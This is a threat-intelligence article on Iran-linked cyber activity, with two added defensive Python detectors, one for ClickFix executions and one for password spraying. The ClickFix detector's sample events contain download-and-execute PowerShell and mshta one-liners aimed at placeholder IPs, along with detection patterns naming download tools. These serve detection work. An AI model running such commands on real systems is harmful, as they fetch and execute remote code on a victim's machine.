March 2026
Heightened Cyber Activity Following Iran Escalation: What Organisations Need to Know
Recent geopolitical tensions involving Iran have triggered a noticeable shift in the cyber security threat landscape. Intelligence from multiple security communities and national cyber authorities indicates that cyber activity linked to Iranian state-aligned actors and proxy groups is increasing.
While the majority of activity currently appears focused on geopolitical targets in the Middle East and allied nations, the global nature of cyber operations means organisations worldwide, including those in Australia, should remain vigilant. Periods of geopolitical instability have historically been accompanied by spikes in cyber espionage, disruptive attacks, and hacktivist campaigns.
This article explores recent activity, the risks posed to organisations, and practical steps to strengthen cyber resilience.
Escalating Activity Across the Iranian Cyber Ecosystem
Iran maintains one of the most active and diverse cyber ecosystems globally, combining state-sponsored intelligence operations with loosely affiliated hacktivist groups. These actors conduct a mix of espionage, disruption, and influence operations aligned with geopolitical objectives.
Recent intelligence highlights activity across several well-known threat groups, including:
- Charming Kitten (APT35) – Known for spear-phishing campaigns targeting political organisations, researchers, journalists, and government officials.
- APT33 (Elfin) – Often linked to attacks against aviation, energy, and critical infrastructure sectors.
- MuddyWater (Seedworm) – Focused on espionage across government, telecom, defence, and financial sectors.
- OilRig (APT34) – Known for supply-chain attacks and targeted credential harvesting campaigns.
- Pioneer Kitten (UNC757) – Exploits vulnerabilities in VPN infrastructure to establish persistent network access.
- Agrius – A destructive threat actor that deploys wiper malware disguised as ransomware.
Alongside these state-aligned actors, Iranian cyber strategy frequently leverages hacktivist proxy groups to conduct disruptive or deniable operations. Groups such as Cyber Av3ngers, Handala, DieNet, and the Fatimion Cyber Team have conducted activities ranging from website defacements and DDoS attacks to intrusions into industrial control systems and surveillance infrastructure.
These groups often coordinate activity during periods of geopolitical tension to amplify disruption and influence operations.
Emerging Campaigns Demonstrate Evolving Tradecraft
Recent threat intelligence also highlights how Iranian-aligned groups are evolving their operational techniques.
One recent espionage campaign targeted government officials using advanced social engineering combined with custom malware. The operation deployed previously unseen .NET-based malware families designed for stealthy persistence and command-and-control communications.
Several notable tactics stood out:
AI-Assisted Malware Development
Evidence suggests generative AI was used during malware development, enabling attackers to rapidly produce customised payloads and iterate tools more quickly than traditional development cycles.
“ClickFix” Social Engineering
Attackers tricked victims into manually executing malicious PowerShell commands by instructing them to “fix browser errors” or join fake collaboration sessions, typically by pasting a supplied command into the Windows Run dialog or a terminal. This approach bypasses many automated security controls because no malicious attachment or exploit is ever delivered: the victim runs the command themselves, in a legitimate interpreter, under their own account.
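As an added example (not code from the original article or from the campaign it describes), the following Python flags ClickFix-style executions in process-creation telemetry: a script interpreter started from the Run dialog (an explorer.exe parent) or a browser, with a command line carrying hidden-window, encoded or download-and-execute switches. The event records, field names, indicator weights and thresholds are all constructed for this illustration and would need tuning against real EDR or Sysmon data.

```python
"""Flag ClickFix-style executions in process-creation telemetry.

Added example: records mimic the fields of a Sysmon Event ID 1 / EDR
process-creation event; events, weights and thresholds are constructed.
"""
import ntpath
import re

# Interpreters a pasted ClickFix one-liner ends up running in.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# explorer.exe is the parent when the victim pastes into the Win+R Run box;
# a browser parent covers "fix" pages that hand a command straight to a shell.
USER_LAUNCH_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# (regex, weight): command-line traits of download-and-execute one-liners.
INDICATORS = [
    (r"-(e|ec|en|enc|encodedcommand)\b", 3),        # base64-encoded script body
    (r"-w(indowstyle)?\s+hidden", 2),               # hide the console from the victim
    (r"\b(iex|invoke-expression)\b", 2),            # run text fetched at runtime
    (r"\b(iwr|invoke-webrequest|curl|wget|downloadstring)\b", 2),
    (r"mshta(\.exe)?\s+https?://", 3),              # remote HTA application
    (r"https?://", 1),                              # second-stage URL
    (r"-nop\b|-noprofile\b", 1),                    # skip profile for a quiet start
]


def score_command(command_line: str):
    """Sum indicator weights over a command line; return (score, matched patterns)."""
    score, hits = 0, []
    for pattern, weight in INDICATORS:
        if re.search(pattern, command_line, re.IGNORECASE):
            score += weight
            hits.append(pattern)
    return score, hits


def classify(event: dict) -> dict:
    """Verdict for one process-creation event."""
    image = ntpath.basename(event["image"]).lower()
    parent = ntpath.basename(event["parent_image"]).lower()
    if image not in INTERPRETERS:
        return {"alert": False, "score": 0, "reasons": [], "parent": parent, "image": image}
    score, hits = score_command(event["command_line"])
    user_launched = parent in USER_LAUNCH_PARENTS
    # A weaker command line is still alert-worthy when a user launched it by hand;
    # a strong one is alert-worthy whatever the parent.
    alert = (user_launched and score >= 3) or score >= 5
    return {"alert": alert, "score": score, "reasons": hits, "parent": parent, "image": image}


def scan(events):
    """Return the events that trip the rule, each with its verdict attached."""
    alerts = []
    for event in events:
        verdict = classify(event)
        if verdict["alert"]:
            alerts.append(dict(event, verdict=verdict))
    return alerts


# Constructed sample events (not real telemetry). The first three are the
# ClickFix shape; the last two are routine activity that must stay quiet.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"user": "corp\\a.nguyen", "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": 'powershell -w hidden -nop -c "iex (iwr http://198.51.100.23/fix.txt -UseBasicParsing)"'},
    {"user": "corp\\b.smith", "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell -ec SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"user": "corp\\c.patel", "parent_image": r"C:\Program Files\Microsoft\Edge\Application\msedge.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://203.0.113.7/verify.hta"},
    {"user": "NT AUTHORITY\\SYSTEM", "parent_image": r"C:\Windows\CCM\CcmExec.exe", "image": PS,
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"user": "corp\\d.kumar", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["user"], hit["verdict"]["score"], hit["command_line"])
```

When investigating a hit, the pasted command also survives in the victim's RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which is worth collecting alongside the process event and the browser history that led to it.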
Stealthy Remote Access Tools
Custom malware included techniques such as hidden Windows forms and delayed communications designed to evade sandbox analysis and automated detection.
These developments demonstrate how threat actors are blending advanced malware with human-centric exploitation techniques to increase success rates.
A Strategic Shift Toward Influence-Driven Disruption
Iranian cyber operations have evolved beyond traditional espionage and defacement campaigns. Security researchers increasingly describe their approach as “influence-driven disruption”.
In these campaigns, attackers:
- Steal sensitive data through espionage operations
- Leak the information publicly through social media or dedicated sites
- Use the breach to undermine public trust and create political pressure
This tactic, commonly referred to as a “hack-and-leak” operation, combines technical compromise with psychological and reputational impact.
Additionally, Iranian actors are increasingly targeting:
- Industrial control systems (ICS) and operational technology
- Internet-facing infrastructure such as VPNs and firewalls
- Internet-exposed devices such as IP cameras and PLCs
- Trusted suppliers and managed service providers
These strategies allow attackers to reach larger numbers of victims through supply chain compromise or infrastructure disruption.
What This Means for Australian Organisations
The Australian Cyber Security Centre (ACSC) has advised that while there is currently no specific evidence of increased targeting of Australia, the evolving geopolitical environment increases the likelihood of opportunistic cyber activity.
Organisations with the following exposure should be particularly alert:
- Operations or supply chains in the Middle East
- Partnerships with international government or defence sectors
- Participation in critical infrastructure ecosystems
- Managed service providers supporting multiple clients
- Organisations with internet-facing infrastructure
Even when attacks are not directly targeted, organisations may still be impacted through:
- Supply chain compromise
- Credential theft campaigns
- Distributed denial of service (DDoS) attacks
- Exploitation of newly disclosed vulnerabilities
- Opportunistic phishing campaigns linked to geopolitical events
Global cyber operations rarely remain contained to a single region.
Key Defensive Measures Organisations Should Prioritise
Given the tactics commonly used by Iranian-aligned actors, organisations should consider strengthening several core defensive controls.
Strengthen Identity Security
Many campaigns rely on credential theft or password spraying.
Recommended measures include:
- Enforcing multi-factor authentication (MFA) across all services
- Monitoring for unusual login patterns
- Implementing conditional access policies
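As an added example of what “monitoring for unusual login patterns” looks like in practice (this is not code from the original article or from any product), the Python below picks out the password-spray shape from authentication logs: one source IP trying many distinct accounts, each only once or twice to stay under lockout thresholds, inside a short window, and then reports any account that source went on to log into successfully. The log format, thresholds and every line of the sample log are constructed for this illustration.

```python
"""Detect password spraying in authentication logs.

Added example: the log format, thresholds and every line in SAMPLE_LOG are
constructed for this illustration and do not come from a real product.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth: result=(?P<result>success|failure) "
    r"user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse_log(text: str):
    """Turn log lines into dicts with a datetime 'ts'; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            e = m.groupdict()
            e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append(e)
    return events


def detect_sprays(events, window=timedelta(minutes=10), min_users=8, max_per_user=2):
    """One finding per source IP whose failures fit the spray shape.

    Spray shape: at least min_users distinct accounts failing inside `window`,
    none tried more than max_per_user times (a spray deliberately stays below
    lockout). Any success from that source after the spray began is reported
    as a probable compromised account.
    """
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)

    findings = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        failures = [e for e in evs if e["result"] == "failure"]
        start = 0
        for end in range(len(failures)):
            # Slide `start` forward until failures[start:end+1] fits in the window.
            while failures[end]["ts"] - failures[start]["ts"] > window:
                start += 1
            per_user = Counter(e["user"] for e in failures[start:end + 1])
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                began = failures[start]["ts"]
                tried = {e["user"] for e in failures[start:]}          # accounts hit from the spray start on
                landed = sorted({e["user"] for e in evs
                                 if e["result"] == "success" and e["ts"] >= began})
                findings.append({"src": src, "began": began.isoformat(),
                                 "distinct_users": len(tried),
                                 "successes_after_spray": landed})
                break  # one finding per source is enough for triage
    return findings


# Constructed sample log. 203.0.113.50 sprays ten accounts and lands on j.lee;
# 198.51.100.8 is one user mistyping their own password, which must not fire.
SAMPLE_LOG = """\
2026-03-02T08:00:01Z auth: result=failure user=a.nguyen src=203.0.113.50
2026-03-02T08:00:19Z auth: result=failure user=b.smith src=203.0.113.50
2026-03-02T08:00:37Z auth: result=failure user=c.patel src=203.0.113.50
2026-03-02T08:00:55Z auth: result=failure user=d.kumar src=203.0.113.50
2026-03-02T08:01:13Z auth: result=failure user=e.wong src=203.0.113.50
2026-03-02T08:01:31Z auth: result=failure user=f.ali src=203.0.113.50
2026-03-02T08:01:49Z auth: result=failure user=g.rossi src=203.0.113.50
2026-03-02T08:02:07Z auth: result=failure user=h.kim src=203.0.113.50
2026-03-02T08:02:25Z auth: result=failure user=i.khan src=203.0.113.50
2026-03-02T08:02:43Z auth: result=failure user=j.lee src=203.0.113.50
2026-03-02T08:02:51Z auth: result=success user=j.lee src=203.0.113.50
2026-03-02T08:04:02Z auth: result=failure user=m.chen src=198.51.100.8
2026-03-02T08:04:15Z auth: result=failure user=m.chen src=198.51.100.8
2026-03-02T08:04:29Z auth: result=failure user=m.chen src=198.51.100.8
2026-03-02T08:04:50Z auth: result=success user=m.chen src=198.51.100.8
"""

if __name__ == "__main__":
    for finding in detect_sprays(parse_log(SAMPLE_LOG)):
        print(finding)
```

The same shape appears in a cloud identity provider's sign-in log as many accounts with an invalid-password result from one IP or autonomous system in a short period; the per-user cap is what separates a spray from a single user locked out of their own account, and a success from the spraying source is the event that should page someone.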
Harden Internet-Facing Infrastructure
Iranian groups frequently exploit known vulnerabilities in edge devices.
Organisations should:
- Prioritise patching of VPN, firewall, and gateway vulnerabilities
- Ensure critical systems are not exposed directly to the internet
- Conduct regular vulnerability scanning and configuration reviews
Improve Phishing and Social Engineering Defences
Modern campaigns increasingly reach victims through collaboration platforms such as Microsoft Teams rather than email alone.
Security awareness training should extend beyond email phishing to include multi-channel social engineering.
Secure Operational Technology and IoT
Industrial systems and smart devices can provide attackers with both operational access and intelligence gathering capabilities.
Best practices include:
- Removing default credentials
- Segmenting OT networks
- Restricting remote access to ICS devices
Prepare for Disruptive Activity
Hacktivist groups often launch nuisance or disruptive campaigns during geopolitical crises.
Organisations should:
- Validate DDoS mitigation procedures
- Test backup and recovery processes
- Review incident response playbooks
Cybersecurity in a Geopolitical Era
Cyber operations have become a central component of modern geopolitical competition. Nation-state actors increasingly blend espionage, disruption, and influence campaigns to achieve strategic objectives without direct military engagement.
For organisations, this means cyber risk can escalate rapidly in response to international events.
While not every organisation will be directly targeted, any organisation connected to global digital infrastructure can become part of the attack surface.
The most resilient organisations focus on three principles:
- Visibility across networks, identities, and cloud environments
- Rapid detection of abnormal behaviour
- Prepared response capabilities
In an environment where cyber threats increasingly mirror geopolitical tensions, preparedness and resilience are essential.
